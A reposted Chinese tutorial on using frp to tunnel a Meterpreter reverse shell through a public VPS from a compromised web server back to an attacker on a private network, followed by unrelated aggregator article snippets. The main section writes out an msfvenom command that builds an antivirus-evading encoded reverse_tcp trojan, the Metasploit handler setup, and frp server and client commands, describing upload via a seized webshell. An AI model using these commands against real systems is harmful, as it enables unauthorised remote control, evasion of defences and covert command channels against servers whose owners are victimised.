frp隧道(流量代理)

news2024/11/23 23:52:34

代理

代理使用场景

  1. 拿下远程web服务器
  2. webshell连接不稳定,需要使用稳定的木马程序
  3. 远程服务器无法直接连接攻击者电脑(内网IP)
  4. 需要借助公网vps转发来自失陷服务器的木马流量
  5. 借助frp服务器(vps)和客户端(内网攻击者)建立隧道
  6. 当vps某一个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量

前提条件

攻击者:

  • 拿下了一台webshell权限
  • 需要上传完整功能的木马
  • 生成一个木马,不管谁执行了这个木马,都会连接vps的4444端口发送流量

代理过程

image-20231013203408275

隧道

失陷主机或服务器:

  • 在执行攻击者上传的木马时主动与vps进行连接
  • 请求与vps的4444端口进行通信,发送流量

公网vps:

  • 攻击者可控
  • 攻击者和受害服务器都可以访问
  • vps使用7000端口(frp软件)进行监听,攻击者向vps发出请求建立隧道(只能由攻击者向vps发出请求,因为公网IP不能访问私网IP)
  • 失陷主机运行木马后,失陷主机将信息通过4444端口传送至vps,vps把自己的4444端口的流量通过7000端口转发给攻击者

frp服务

frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。

  • 内网kali用户上配置frpc客户端

  • vps7.7.7.7上配置frps服务端

  • frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道

  • frp服务(vps)的4444端口会主动转发(通过7000端口)给客户端设定接收流量的端口

内网IP查看能否与外网通信

image-20231013202952351

image-20231013202942155

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.223 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

解释:

这是一个使用Metasploit框架中的msfvenom工具生成恶意软件的命令。

  • -p :指定Payload(有效负载:木马的功能点)为Windows Meterpreter反向TCP连接。Meterpreter是Metasploit框架中一个功能强大的远程访问工具。
  • LHOST:设置本地监听IP地址为10.9.75.223。这是恶意软件将连接到的主机IP地址。
  • LPORT:设置本地监听端口号为4444。这是恶意软件将连接到的主机端口号。
  • -e :使用x86/shikata_ga_nai编码来混淆Payload,以避免被基于特征的防病毒软件检测。
  • -f :设置生成的恶意软件文件格式为可执行文件(exe)。
  • -o :指定生成的恶意软件文件名为shell.exe。
  • -i :设置编码迭代次数为5,以增加避免被检测的难度。

木马上传至失陷主机

image-20231013210028793

image-20231013210045558

监听

1、启动msf :msfconsole
2、载入监控模块  :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
run

image-20231013211002873

image-20231013211044543

image-20231013211350995

kali主机启动监听等待木马连接

失陷主机运行木马后将流量数据包发送给vps的4444端口,但是vps没有开放4444端口

image-20231013211818294

vps开启frp服务:

frp服务端

image-20231013212051157

查看frp服务端的配置文件,当启动frp服务端的时候默认开启7000端口和客户端连接。向客户端发流量数据包。

image-20231013212401559

在frps.exe所在文件打开cmd

frps.exe -c frps.ini	#启动frp服务器

image-20231013212818486

frp客户端:

解压frp客户端压缩包

tar xf frp_0.33.0_linux_amd64.tar.gz

image-20231013213128458

进入frp_0.33.0_linux_amd64目录查看客户端配置信息

cd frp_0.33.0_linux_amd64
ls
sudo vim frpc.ini

image-20231013214823409

启动frp客户端(frpc)

sudo ./frpc -c frpc.ini		#启动客户端

image-20231013215101685

image-20231013215649015

运行木马

失陷主机运行木马

image-20231013220215872

image-20231013220244608

打开生成木马界面获得shell

image-20231013220330963

image-20231013220424012

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1091221.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于SSM的班级事务管理系统

基于SSM的班级事务管理系统 开发语言:Java数据库:MySQL技术:SpringSpringMVCMyBatisVue工具:IDEA/Ecilpse、Navicat、Maven 系统展示 前台界面 登录界面 班委界面 学生界面 管理员界面 摘要 基于SSM(Spring、Spring…

EMC Unity存储(VNXe) service Mode和Normal Mode的一些说明

本文介绍下EMC unity存储设备(也包含VNXe存储设备)的两种工作模式: Service mode:也叫做rescue mode,存储OS工作不正常或者有其他故障,就会进入这个模式,无法对外提供服务Normal mode&#xff…

图文并茂手把手教你在MAC配置Android,nodejs,git,brew环境,配置安卓真机支持投屏以及测试

先说nodejs和npm 这个很简单,只需要点击下面链接,安装node.js环境即可 https://nodejs.org/zh-cn/ Android Android Studio 下载地址及版本说明 Android 开发者官网:https://developer.android.com/index.html (全球&#xff…

大数据可视化模块竞赛Vue项目文件结构与注意事项

1.vue项目src目录下只有两个文件夹与两个js文件,如图所示: 2.asseets目录存放包或其他外部资料 注意 :echarts采用的是引用外部文件导入 let echarts = require(@/assets/echarts.min.js) 3.components目录存放绘制页面的vue文件(我这里示例创建了一个newPage.vue)…

彩票系统java

【题目要求】: 设计实现一种彩票系统,根据彩票规则,进行开奖和公布开奖结果,设计报告中给出彩票的规则。 【彩票规则】: 系统会随机生成一个四位的号码作为此次的中奖号码,用户根据系统的文字提示输入自…

树莓派玩转openwrt软路由:11.OpenWrt安装NodeRed

1、更新软件源 opkg update2、安装nodered docker run -it -p 1880:1880 --name mynodered nodered/node-red3、安装完整性测试 实现一个打印hello world的demo,每隔1秒打印一次

2.9 深入GPU硬件架构及运行机制

五、GPU技术要点 1.SMID和SIMT SIMD(Single Instruction Multiple Data)是单指令多数据,在GPU的ALU(在Core内)单元内,一条指令可以处理多维向量(一般是4D)的数据。比如&#xff0c…

python+大数据校园卡数据分析 计算机竞赛

0 前言 🔥 优质竞赛项目系列,今天要分享的是 🚩 基于yolov5的深度学习车牌识别系统实现 🥇学长这里给一个题目综合评分(每项满分5分) 难度系数:4分工作量:4分创新点:3分 该项目较为新颖&am…

3.MySQL数据类型详解

个人主页:Lei宝啊 愿所有美好如期而遇 目录 1.数据类型分类 2.数值类型 (1).tinyint,smallint类型等 (2)bit类型 (3)小数类型 1).float 2).decimal 3.字符串类型 (1)char (2)varchar (3)char和varchar比较 (4)日期和时间类型 (5)enum和se…

Vue3<script setup>语法糖下,实现父子组件通信以及数据监听。

在Vue3的script setup语法糖中,没有办法通过Vue2的ref、props、parent、中央时间总线等等众多方法,通过this指针简单的实现父子组件的通信,网络上也很少有关于script setup语法糖的相关教程,所以决定自己写一个详细教程&#xff0…

创建IDEA模板

将常用的配置文件内容、模板框架等放到IDEA的模板中保存,方便以后使用。以mybatis-config.xml和一个映射文件为例(这是我自己学习SSM时用到的,后面学习SpringBoot时发现配置都只需要写到application.yml中就ok了,配置变得非常简单…

07_03文件系统怎么玩的

文件系统 Linux将文件系统分为了两层:VFS(虚拟文件系统)、具体文件系统,如下图所示: VFS(Virtual Filesystem Switch)称为虚拟文件系统或虚拟文件系统转换,是一个内核软件层&#…

【计算机网络】IP协议详解

文章目录 一、引入 二、简单认识IP协议 2、1 IP协议基本概念 2、2 IP协议报文格式 2、3 分片与组装 2、3、1 MTU 与 MSS 2、4 网段划分 2、4、1 简单理解路由 2、4、2 IP地址 2、4、3 IP地址的划分 2、4、4 CIDR(无类别域间路由) 2、4、5 特殊的IP地址 …

磁盘非跨盘访问算法实现

1. 背景说明 本算法基于已将磁盘分布合并并排序为升序线性表。实现示例为:磁盘扇区大小:32(可自定义),待拆分磁盘内存: [0 - 50],[60 - 100](可增加)。示意图如下&#x…

【电机控制】FOC电机控制

FOC(Field-Oriented Control,磁场定向控制)是一种电机控制策略,又称矢量控制,是通过控制变频器输出电压的幅值和频率控制三相直流无刷电机的一种变频驱动控制方法。 FOC 的实质是运用坐标变换将三相静止坐标系下的电机…

什么是 CSRF 、原理及其解决方式

什么是 CSRF ? 跨站请求伪造(CSRF,Cross-site request forgery),也称为 XSRF,Sea Surf 或Session Riding,是一个攻击向量,它欺骗 Web 浏览器在登录用户的应用程序中执行不需要的动作…

如何处理前端国际化和本地化?

聚沙成塔每天进步一点点 ⭐ 专栏简介 前端入门之旅:探索Web开发的奇妙世界 欢迎来到前端入门之旅!感兴趣的可以订阅本专栏哦!这个专栏是为那些对Web开发感兴趣、刚刚踏入前端领域的朋友们量身打造的。无论你是完全的新手还是有一些基础的开发…

“比特币市场风起云涌:第三季度报告揭示表现和未来趋势“

要点: 比特币的季度价格表现较差,为 -11.5%,但今年迄今为止的表现仍优于大多数资产类别; 截至撰写本文时,上半年推动比特币上涨的美国购买力已完全减弱; 交易量、流动性、波动性和搜索趋势均继续…

idea安装汉化插件

settings plugins 插件搜索chinese 重启 成功

第五十五章 学习常用技能 - 删除存储的数据

文章目录 第五十五章 学习常用技能 - 删除存储的数据删除存储的数据重置存储Storage浏览表格 第五十五章 学习常用技能 - 删除存储的数据 删除存储的数据 在开发过程中,可能需要删除某个类的所有现有测试数据,然后重新生成它(例如&#xff…